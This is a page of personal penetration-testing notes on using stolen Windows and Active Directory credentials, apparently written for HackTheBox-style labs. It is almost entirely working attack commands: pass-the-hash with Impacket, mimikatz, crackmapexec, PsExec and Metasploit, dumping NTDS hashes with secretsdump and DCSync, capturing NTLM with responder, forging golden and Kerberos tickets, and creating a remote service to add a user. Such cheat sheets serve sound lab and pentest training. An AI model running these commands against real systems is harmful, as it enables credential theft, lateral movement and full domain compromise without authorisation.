Robert H. Osborne
  • Home
  • GitHub
  • Write-Ups
    • Resolute
    • Rope
    • Patents
    • Mango
    • Obscurity
    • OpenAdmin
    • Postman
    • Control
    • Traverxec
    • Registry
    • Sniper
    • BankRobber
    • Forest
    • Zetta
    • RE
    • Player
    • Smasher2
    • JSON
    • Scavenger
    • AI
    • Heist
    • Craft
    • BitLab
    • Wall
    • Writeup
    • Luke
    • Bastion
    • HelpLine
    • HackBack
    • Conceal
    • CTF
    • Querier
    • Friendzone
    • Fortune
    • Netmon
    • Get HTB Invite Code
  • Pen Testing Notes
    • Enumeration
    • Pivoting Proxies
    • File Transfer
    • PrivEsc
    • Credentials
    • Firewall
    • WiFi Password Cracking
    • SSDP Spoofing
    • Ettercap Spoofing
    • ARP and DNS Spoofing
    • PowerShell Tools
    • AppLocker Bypass
    • SUID Notes
    • SQL Injections
    • Certificates
    • Services
    • Reverse Shells
    • TTY Shell
    • Chroot Jail
  • Privacy Policy

Read more Blogs by tobor at https://powershell.org

Robert H. Osborne
  • Home
  • GitHub
  • Write-Ups
  • Pen Testing Notes
  • Privacy Policy

Credentials

Using Credentials

PASS THE HASH TECHNIQUES

# WMIEXEC
proxychains python /opt/ActiveDirectory/impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200

# SMBCLIENT
smbclient -U domain/user%hash:hash -n <netbios name> -W <domain> //<ip>/share$

# PTH-WINEXE
pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:3fee04b01f59a1001a366a7681e95699 //10.11.1.123 cmd

# PTH-SMBCLIENT
pth-smbclient //CORPDC01/c$ -U corp/user_a%aad3b435b51404eeaad3b435b51404ee:48663e7b299fe3a7047b937804cdc34d

# CRACKMAPEXEC
crackmapexec <ip> -u user -H <hash>

# MIMIKATZ
privilege::debug
sekurlsa::pth /user:<user> /domain:<domain.com> /ntlm:<hash>

# RDP
xfreerdp /u:admin /d:domain /pth:hash:hash /v:192.168.1.101

# METASPLOIT
use exploit/windows/smb/psexec
set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c

# PSEXEC
PsExec.exe -accepteula \\ corpsqlserver01 -s -u corp\user_a -p aad3b435b51404eeaad3b435b51404ee:48663e7b299fe3a7047b937804cdc34d cmd.exe

# IMPACKET SECRETS DUMP
secretsdump.py -just-dc-ntlm –user-status –outputfile | ./NTDSData/CORP/ntds20170711-13.05 -hashes aad3b435b51404eeaad3b435b51404ee:48663e7b299fe3a7047b937804cdc34d corp/user_a@corpdc01



# USING FOUND PASSWORD

$Passw = ConvertTo-SecureString 'P@ssw0rd1!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\user', $Passw)
Start-Process C:\Windows\System32\spool\drivers\color\msf.exe -Credential $Cred


Check For Stored Credentials

cmdkey /list
 


Use Stored Credentials:

runas /user:administrator /savecred "cmd.exe /k whoami"



Access SMB With Credentials:

python  /usr/share/doc/python3-impacket/examples/smbclient.py  <Domain>/<user>@<ip> -hashes  <part1>:<part2>



In Metasploit
use auxiliary/scanner/smb/smb_login 



crackmapexec <ip(s)> -d <domain> -u <user> -p <pass>
exploit/windows/smb/psexec



Map A Drive

net use z: \\<ip>\c$ /user:<username> <password>
 


Gain A Hash

1.) Start responder Be sure to include --lm
responder -I tun0 --lm

2.) Issue dementor to obtain an ntlm response
proxychains python dementor.py -d htb.local -u <user> -p <password> <target ip> <listening ip>

 l


METERPRETER KIWI

Get Hash As Domain Admin (kiwi):

dsync_ntlm <domain>\\<user>
 

Create Golden Ticket (kiwi):

golden_ticket_create  -d <domain> -k <krbtgt hash> -s <domain-sid> -u  <name, does not have to exist (but can)> -t <filename>
 


Create Skeleton Ticket With Impacket

python  ticketer.py -nthash <hash> -domain-sid  <sid> -domain OsbornePro DEV\$

     OR

python  ticketer.py -nthash <hash> -domain-sid  <sid> -domain HTB DEV

OR

python  ticketer.py -nthash <hash> -domain-sid  <sid> -domain OsbornePro -spn cifs/<ip> <username>



USE THAT CREATED SKELETON TICKET:

1.) Set Value

export KRB5CCNAME=/root/Downloads/Tickets/OsbornePro.cache


2.) Edit krb.conf File

nano /etc/krb5.conf
# CONTENTS

[realms]
       DOMAIN.COM = {
               kdc = dev.domain.com
               kdc = web.domain.com
               kdc = dc.domain.com
               admin_server = dc.domain.com
}

3.) Connect To Target

proxychains smbclient \\\\<IP>\\C$ -U <user> -C -N



 Create A Service To Exploit:

1.) Create A Service To Make A User

python  /usr/share/doc/python3-impacket/examples/services.py -dc-ip <ip of  domain controller> -k -no-pass <ip of target> create -name  <username> -display <username> -path 'net user  <username><password> /add'


2.) Check The Service Values
proxychains /usr/share/doc/python3-impacket/examples/services.py -dc-ip  <DC IP> -k -no-pass <targetIP> config -name  <createduser>


3.) Start The Service To Execute Command
proxychains python /opt/ActiveDirectory/impacket/examples/services.py -dc-ip <DC IP> -k -no-pass <TargetIP> start -name <username>
 


Use Golden Ticket (kiwi):

kerberos_ticket_use <filename>
 


Dump Domain Hashes With DCSync:

log
lsadump::dcsync /domain:<domain> /all /csv
 


Create Golden Ticket Mimikatz:

kerberos::golden  /user:<name> /domain: <domain> /sid:<domain-sid>   /krbtgt:<krbtgt hash> /ticket:<filename> /groups:<comma  seperated groups this 'virtual' user is part of
 


Use Golden Ticket Mimikatz:

kerberos::ptt <filename>


====================

LINUX

====================

Become another user

  su <username>


Become root User:

su -

OR

su root



Execute Command As Root:

sudo <command> 


Execute Command As Another User:

sudo -u <username> <command>    

Copyright © 2020 Robert H. Osborne - Osborne Pro

  • Privacy Policy